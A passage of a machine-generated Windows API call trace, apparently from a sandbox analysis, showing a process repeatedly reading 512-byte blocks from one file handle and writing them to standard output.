(hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.426] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.426] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.427] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.427] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.428] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.428] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.429] GetFileType (hFile=0x50) returned 0x1 [0145.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.429] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.429] GetFileType (hFile=0x50) returned 0x1 [0145.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.429] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.429] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.429] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.429] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.429] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.429] GetFileType (hFile=0x50) returned 0x1 [0145.429] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.429] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.429] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.430] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.431] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.432] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.433] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: 